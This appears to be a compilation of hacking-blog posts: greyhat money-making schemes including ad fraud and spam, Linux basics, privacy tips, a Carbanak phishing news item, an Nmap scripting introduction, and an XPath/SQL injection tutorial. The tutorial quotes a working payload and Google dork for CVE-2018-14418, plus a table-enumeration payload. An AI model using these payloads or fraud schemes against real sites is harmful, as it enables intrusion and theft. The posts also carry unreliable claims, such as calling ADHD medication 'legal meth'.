How Do Greyhats make Money?

How Do Greyhats Earn?

I highly debated whether or not to post this short list because I knew that half the things in here are very annoying Mal-practices. These are commonly frowned upon but not necessarily illegal practices. That being said, I don’t recommend you do any of these things.

  • Ip hopping and ad clicking (clicking ur own advertisements) (Illegal in most countries; ad fraud)
  • Bug bounty
  • Fake Niche marketing
  • spam
  • web crawling/scraping for emails proxies or other valuable data
  • dork creation
  • video game hacking

Comment below If you want a tutorial explaining any of the above concepts. Keep in mind I don’t advise you do any of these things. And I certainly don’t hold any responsibility for the usage of these methods.

NSA’s Reverse Engineering Tool Free!

The NSA released its reverse engineering tool, ghidra fore free to the public. This is a real treat to all the malware analysts, software hackers, bug bounty hunters and reverse engineers out there. Here is a really powerful tool comparable to IDA Debugger that is made for this kind of stuff.  I recommend anyone with an interest in reverse engineering goes and checks it out.

Top Linux Commands for Beginners 2019

Essential Linux Commands

I recommend testing the following commands in a linux terminal on your own so you can see first hand how they work in your version of linux. Keep in mind the outputs may change a bit depending on the OS.

pwd

This command stands for print working directory and it does just that. Pwd prints the directory you are currently in.

himanshu@ansh:~$ pwd
/home/himanshu

ls

This command lists all the files and sub directories in the working (current) directory

# ls

0001.pcap        Desktop    Downloads         index.html   install.log.syslog  Pictures  Templates
anaconda-ks.cfg  Documents  fbcmd_update.php  install.log  Music               Public    Videos

cd

This command stands for change directory. It allows you to change directories.

user@wikipedia:~$ cd games
user@wikipedia:~/games$

There are many other ways to utilize this command. Here is a more complete resource on the command https://www.tecmint.com/cd-command-in-linux/

cat

The cat command reads out all the content of a readable file in a non interactive way. An alternative to this command would be to use nano or Vi/Vim if you would like to be able to edit the contents of the file.

# cat /etc/passwd

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
narad:x:500:500::/home/narad:/bin/bash

mkdir

This command creates a directory

mkdir mydirectory
ls
mydirectory

rm

This command removes a file. By default it is not able to remove directories. You need rmdir to do this.

rm /home/hope/-file.txt

mv

This command moves or renames files and directories.

mv [filename] [new_filename]
mv fullnames.txt /home/himanshu/Downloads

locate

This command is able to locate files within the filesystem on your OS

$ locate LAMP-Setup.odt

/home/tecmint/LAMP-Setup.odt
/home/tecmint/TecMint.com/LAMP-Setup.odt

apt-get

apt-get is a package manager that is commonly found on debian based distributions of linux. Other examples of commonly used package managers are :  pacman and zypper. Make sure you know what package manager your OS is using. I reccomend newbies stick to highly supported debian based distros at first. apt-get is very easy to get used to.

ex:
sudo apt-get install libc6
ex #2:
sudo apt-get update
ex #3
sudo apt-get upgrade

clear

This command will clear everything in the terminal which will clear up space. NOTE: This doesn’t delete any logs so don’t think of this as a way to trace your steps or anything.

How To Protect Yourself From Corporate Censorship

  • Use Decentralized alternatives.
  • Fire up that VPN
  • Fortify your browser and your devices
  • Utilize Aliases for your own protection

Decentralized alternatives to popular websites on the internet are slowly beginning to pop up and gain prevalence as we are seeing increased prevalence on various media sources. Alternatives to youtube and other social networking sites like DTube exist. Here is an article listing 4 popular decentralized Social media platforms. Entirely decentralized portions of the internet are currently being tested. And of course we obviously have anonymizing darkwebs such as Tor, Freenet and I2P. However I would be an idiot not to note the fact that these platforms have had extreme amounts of trouble gaining any sort of traction with their target audience due to the fact that they lack the addictive simplicity that services like Instagram, Facebook, and Youtube have. Only time will tell if one of these platforms will gain enough popularity to become viable alternatives to what we currently have.

Get a paid VPN. Securing your connection to the internet is of the utmost importance due to the potential for 3rd party eves-droppers and the fact that we really don’t know what information is being given away by our internet service providers.

Utilize TOR or some other encrypted peer to peer darknet like I2P or Freenet. These systems are for the ultra-paranoid, and I don’t really recommend them for the average user who is simply trying to protect themselves  preemptively.

Be careful what you download and get an Antivirus. Utilize www.virustotal.com to see if the file you have downloaded shows up on ANY antivirus. You can also use nodistribute.com if you don’t want your scan results sent to the antivirus companies. Protecting yourself from malware can help prevent your privacy from being invaded by governments or people.

Know your rights. Google around to know what the copyright and internet laws are in your area. Be aware of what the government can and cannot do to you legally.

Utilize secure Open Source software and host your own servers. Offshore servers may sometimes be necessary in the absolute worst cases of censorship. Open Source will ensure that no company will be able to revoke access to the software. The government hates open source because they can’t get their backdoors implanted into the code as easily, although it has potentially happened so be aware.

Note: I am speaking about all this in wake of the recent Mass censoring of Alex Jones and Infowars. Regardless of what your political ideology is, everyone deserves to be able to have their ideas heard. In current times, Corporate Censorship is a new breed altogether. Normally it would be the government, but with big corporate run media platforms anyone can be censored off the platforms if it serves the corporate interest. I’m no anti-capitalist. Quite the contrary, but I do think we need to push the free market in a direction that prevents censorship. Decentralized platforms and Open Source software can help with this. Stay safe.

 

Why Hacking Computers Will Free Your Mind.

Today children are indoctrinated at a young age into school systems around the world. These school systems use the same teaching methods that they’ve been using for hundreds of years. No one thinks to question why we haven’t changed our methods. That is because public school systems are extremely efficient at producing one thing. That thing is Laborers. Some people go to college and become skilled laborers, but most do not and remain unskilled laborers.

Laborers are very good at completing sets of tasks given to them by whoever is in charge. In other words, Laborers are machines that complete a given set of instructions.

Hmmm…. That sounds alot like a computer. So through a 12-13 year process, humans are brainwashed and turned into machines that complete tasks. The problem with this is that the process of rewiring humans to complete monotonous tasks en repertoire causes their minds to become rigid. The children slowly lose the ability to imagine and problem solve.

Anyone who struggles and holds to their imagination is immediately seen as a problem child and is either remediated or medicated. Energetic young kids who would rather be outside experiencing life? ADHD. Kids who don’t struggle but rather become sluggish and unmotivated due to the repetitive nature of their tasks? Depressed. It takes years to get a doctorate degree in psychology but It only takes a few minutes for a kindergarten teacher to recommend children take legal meth.

Compound this with the fact that nobody except the elite gets taught anything about personal finance. They’re setting you up not only to be a brain-dead figurative (or literal) assembly-line worker, but a debt slave. Slavery never ended. It just evolved.

The answer is to focus on legitimate problem solving skills and reasoning. That compounded with a solid understanding of personal finance will bring you the freedom that you know you desire in your heart of hearts. I don’t care if you’re 15 or 55. If you have those two things, you’ll make it out and nobody will be able to tell you what to do.

There are many disciplines that teach problem solving and reasoning. Engineering, mathematics, chemistry, philosophy, business, finance, Computer Science, hacking. Any of these fields (and plenty that I missed) are respectable and will get you somewhere if you apply yourself. But If you’ve come to this blog in particular then you know which one I lean towards.

Its the information age. Everything is increasingly influenced by computer networks and software. If you fully understand all of the networks and all of the software, then effectively; you are god.

But anyone who has done even a little bit of hacking knows that the more you learn in this profession, the more you begin to realize that you don’t know shit. The same could be said about alot of the theoretical branches of science, but I can tell you that as we speak there is likely software being developed by some guy in his basement that will turn our world upside down within a few weeks, months or even years. Change is constant. Being forced to accept and adapt to this will grant you flexibility of mind. Thats why most college graduates can’t handle infosec in any respectable manner. They were taught on node.js when today everyone is using react and tomorrow they will be using angular. You get the picture.

This is a call to action of sorts. Go out there and solve problems. Download the Metasploitable 2 VM and start trying to hack it. Its like a puzzle and you will definitely gain something from the experience.

Social Engineering In Action. Ukranian Hackers Busted!

Free picture (Corruption in Ukraine Ukrainian hackers) from https://new.torange.biz/fx/corruption-ukraine-ukrainian-hackers-172199

The Hack

Three Ukranian hackers connected to attacks on over 100 American businesses have been arrested. They used social engineering attacks and phishing attacks to steal financial information from a lot of businesses.  These hackers were part of the Carbanak Group

Frequently the group would send emails disguised as hotel reservations. Said emails would contain malware designed to steal sensitive data.

The Carbanak Group sent an FDA food poisoning related email to a restaurant. They attached a list of “inspections and checks” which the business opened. Of course, the attachment contained malware.

Dmytro Fedorov, Fedir Hladyr and Andrii Kolpakov are being charged with wire fraud, conspiracy, computer hacking, access device fraud, and identity theft. So it looks like jail time is very likely for the Carbanak Group.

How to prevent

What can I do to prevent such an attack on my personal life or business? Social Engineering attacks are becoming extremely common today, because they are very easy to create and they tend to have a very high payoff for the hacker. First you need to know what phishing is. Phishing is when a hacker disguises some form of web service, message or other form of correspondence to make it appear like its coming from a legitimate source.

So my main advice is to always check the URL. Make sure it is secure (https) and if it has a SSL certificate thats even better. If you recieve an email always look at the domain of the email. Any misspellings in the domain can mean that its fake. If there are attatchments do not open them until you have verification that they are safe. If you cannot get verification that its from a legitimate source, you can always scan the attatchments before opening them, or analyze them within a VM.

Do not give your password away via plaintext ever. Use a VPN if you’re in public as there are potentially people who could be evesdropping on public networks (like at a Starbucks or Mcdonalds Wi-Fi) And Install an Anti-Virus on your PC. Also get the antivirus’s browser addon. These addons can tell you if the site has been reported as a hacked hacked site or a phishing attack.

XPATH SQL Injection Using a Recent Example

Xpath Injection

I’m going to show you a recent example of XPATH injection from exploit-db. This is a common method you’ll have to use when the basic Union Select injection doesn’t work and neither does a string injection. Its a bit more tedious because you’ll have to use limit most of the time.

Fixing Injection

Fixing this kind of injection is relatively simple. According to OWASP:

“Just like SQL injection, in order to protect yourself you must escape single quotes (or double quotes) if your application uses them.”

OWASP logo

Here Is OWASPs’s article on XPATH Injection Vulnerability. I highly advise reading it in order to understand how to prevent this from happening on your own site. If you’re an aspiring penetration tester, this is important to know as well so you can advise your clients.

Example exploit

# Exploit Title: MSVOD V10 ¡V SQL Injection # Google Dork: inurl:"images/lists?cid=13" # Date: 2018/07/17 # Exploit Author: Hzllaga # Vendor Homepage: http://www.msvod.cc/ # Version: MSVOD V10 # CVE : CVE-2018-14418 #Reference : https://www.wtfsec.org/2583/msvod-v10-sql-injection/ Payload: /images/lists?cid=13%20)%20ORDER%20BY%201%20desc,extractvalue(rand(),concat(0x7c,database(),0x7c,user(),0x7c,@@version))%20desc%20--%20
You can tell by looking at the payload that this is an XPATH injection because of the simple fact that it is using “extractvalue”.
Here the cid parameter is vulnerable. But if you were to try union based injection it wouldn’t work. There are a few things to try in this scenario, but one of them is extractvalue.
The actual payload would be
/images/lists?cid=13 ) ORDER BY 1 desc,extractvalue(rand(),concat(0x7c,database(),0x7c,user(),0x7c,@@version)) desc --
Other than the Union Select being missing there is really no difference in the injection.
However, In some cases with XPATH injection you will be stuck going by single lines which can be very time consuming. You will have to use
Limit 0,1, limit 1,1, limit 2,1, etc
One example payload where you’d have to use this method:
?id=1 and extractvalue(rand(),concat(0x3a,(select concat(0x3a,table_name) from information_schema.tables limit 0,1)))--
Here is a link to a useful tutorial on XPATH injections. The english is a little bad, but if you have any questions don’t hesitate to ask them in the comments. This is only to be used for educational or legal purposes. Keep in mind that I take no responsibility for your actions.
The exploit-db and CVE:

NSE Nmap has Hidden Potential

Nmap is THE go-to tool for network mapping. What you might not know is that it also has an absurd amount of power and flexibility due to the fact that it also functions as a vulnerability scanner and an exploitation framework! Not only that, but it also doubles as a replacement for netcat, aka The hacker’s sswiss army knife. Yep. every recent Nmap installation comes with Ncat, the modernized clone of netcat that supports ssl encryption. Making it the more practical of the two in today’s age of encryption.

Example usage:

$ ncat 192.168.1.100 80

Image result for billy mays

But wait there’s more!

Nmap now has the Nmap Scripting Engine. This gives it way more versatility than ever before. None of this is new news to alot of people I realize, but its a bit impressive if you take a step back and think about the fact that Nmap started off as a simple portscanner.

To use NSE we must first locate where all the scripts are so we can know what we’ve got as well as where to put new scripts that we might code ourselves and also where to put scripts we’ve taken from the internet.

If you’re on linux just type “locate *.nse”

$ locate *.nse
/usr/share/nmap/scripts/acarsd-info.nse
/usr/share/nmap/scripts/address-info.nse
/usr/share/nmap/scripts/afp-brute.nse
/usr/share/nmap/scripts/afp-ls.nse
/usr/share/nmap/scripts/afp-path-vuln.nse
/usr/share/nmap/scripts/afp-serverinfo.nse
/usr/share/nmap/scripts/afp-showmount.nse
/usr/share/nmap/scripts/ajp-auth.nse
/usr/share/nmap/scripts/ajp-brute.nse
/usr/share/nmap/scripts/ajp-headers.nse
/usr/share/nmap/scripts/ajp-methods.nse
/usr/share/nmap/scripts/ajp-request.nse
/usr/share/nmap/scripts/allseeingeye-info.nse
/usr/share/nmap/scripts/amqp-info.nse
/usr/share/nmap/scripts/asn-query.nse
...

Now we know where the scripts are installed, but how do we use it?

$ nmap -sC TargetNameHere

The above command will run the default scripts against a target (url or IP). The following is an example of how to use a specific script against a target.

$ nmap --script smb-check-vulns-nse 192.168.1.1

Now you know the basics, but the trick is to go out and learn how to write your own scripts. I’ll do that in a later tutorial if its asked for, but in the mean time, go and see if you can find some nse scripts written by other people. There is alot that people have accomplished on their own. Thats the beauty of open source. One example of this is nmap vulnerability scan on github (link below) They have a script that connects to several regularly updated vulnerability databases and scans from those. Check the github for usage and installation instructions. This is a powerful tool, so I leave it in your hands. Don’t do anything stupid with it.

https://github.com/scipag/vulscan